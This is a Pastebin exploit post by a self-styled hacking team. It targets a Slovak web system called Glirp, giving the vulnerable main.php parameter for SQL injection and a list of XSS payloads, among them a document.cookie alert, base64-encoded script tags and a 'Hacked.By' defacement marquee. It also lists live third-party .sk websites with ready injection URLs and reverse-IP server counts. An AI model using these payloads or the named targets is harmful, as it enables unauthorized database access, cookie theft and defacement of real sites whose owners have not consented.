KingSkrupellos

Webdizajn Glirp.Sk System Glirp XSS SQL Injection

Apr 12th, 2020
129
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.81 KB | None | 0 0
  1. ###################################################################
  2.  
  3. # Exploit Title : Webdizajn Glirp.Sk System Glirp XSS SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 13 April 2020
  7. # Vendor Homepage : glirp.sk
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  12. Special Elements used in an SQL Command ('SQL Injection') ]
  13. CWE-79 [ Improper Neutralization of Input During
  14. Web Page Generation ('Cross-site Scripting') ]
  15. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  16. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  17. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  18. # Pastebin : pastebin.com/u/KingSkrupellos
  19.  
  20. ###################################################################
  21.  
  22. # Impact :
  23. ***********
  24. Webdizajn Glirp.Sk System Glirpis prone to an SQL-injection vulnerability because it fails to sufficiently
  25. sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow
  26. an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities
  27. in the underlying database. A remote attacker can send a specially crafted request to the vulnerable
  28. application and execute arbitrary SQL commands in application`s database.
  29. Further exploitation of this vulnerability may result in unauthorized data manipulation.
  30. An attacker can exploit this issue using a browser or with any SQL Injector Tool.
  31.  
  32. Reflected XSS (or Non-Persistent) :
  33. ***************************************
  34. The server reads data directly from the HTTP request and reflects it back in the HTTP response.
  35. Reflected XSS exploits occur when an attacker causes a victim to supply dangerous content
  36. to a vulnerable web application, which is then reflected back to the victim and executed by the
  37. web browser. The most common mechanism for delivering malicious content is to include
  38. it as a parameter in a URL that is posted publicly or e-mailed directly to the victim.
  39. URLs constructed in this manner constitute the core of many phishing schemes, whereby
  40. an attacker convinces a victim to visit a URL that refers to a vulnerable site. After the site reflects
  41. the attacker's content back to the victim,the content is executed by the victim's browser.
  42.  
  43. ###################################################################
  44.  
  45. # SQL Vulnerable Filename :
  46. **************************
  47. /main.php
  48.  
  49. # SQL Vulnerable Parameter :
  50. **************************
  51. ?sID=[ID-NUMBER]&kID=[ID-NUMBER]&strankaID=[SQL Injection]
  52.  
  53. # SQL Injection Exploit :
  54. **********************
  55. /main.php?sID=[ID-NUMBER]&kID=[ID-NUMBER]&strankaID=[SQL Injection]
  56.  
  57. # Cross Site Scripting XSS Exploit :
  58. ********************************
  59. 1%27<marquee><font%20color=lime%20size=32>Hacked.By.KingSkrupellos.</font></marquee>
  60.  
  61. "><script>alert(String.fromCharCode(88,83,83))</script>
  62.  
  63. ">--></SCRIPT>KingSkrupellos<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>%20HTTP/1.1
  64.  
  65. <ScRipT>alert("XSS");</ScRipT>
  66.  
  67. "><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script>
  68.  
  69. “><ScRiPt>alert(document.cookie)</script>
  70.  
  71. data:text/html,<script>alert(0)</script>
  72.  
  73. <script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>
  74.  
  75. ';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
  76.  
  77. <svg onload=alert(1)//
  78.  
  79. <object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
  80.  
  81. "`'><script>\xE2\x80\x84javascript:alert(1)</script>
  82.  
  83. ###################################################################
  84.  
  85. # Example Vulnerable Sites :
  86. *************************
  87. Reverse IP results (46.229.230.40)
  88. There are 1,232 domains hosted on this server.
  89. Reverse IP results (37.9.175.5)
  90. There are 5,927 domains hosted on this server.
  91. Reverse IP results (82.208.7.138)
  92. There are 108 domains hosted on this server.
  93. Reverse IP results (80.82.144.154)
  94. There are 238 domains hosted on this server.
  95.  
  96. [+] jk-combi.sk/main.php?sID=59&kID=3&strankaID=1%27
  97.  
  98. [+] lkwnataly.sk/main.php?sID=59&kID=3&strankaID=1%27
  99.  
  100. [+] lkwrusnak.sk/main.php?sID=59&kID=3&strankaID=1%27
  101.  
  102. ###################################################################
  103.  
  104. # Example SQL Database Error :
  105. ****************************
  106. You have an error in your SQL syntax; check the manual that corresponds
  107. to your MySQL server version for the right syntax to use near ''1''' at line 1
  108.  
  109. ###################################################################
  110.  
  111. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  112.  
  113. ###################################################################
Add Comment
Please, Sign In to add comment